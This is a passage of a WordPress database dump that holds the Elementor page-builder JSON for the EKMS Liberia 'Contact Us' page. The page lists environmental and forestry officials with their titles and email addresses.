href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com <\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14808,2349,'_elementor_edit_mode','builder'),(14809,2349,'_elementor_template_type','wp-page'),(14810,2349,'_elementor_version','2.7.5'),(14811,2349,'_wp_page_template','default'),(14812,2349,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a 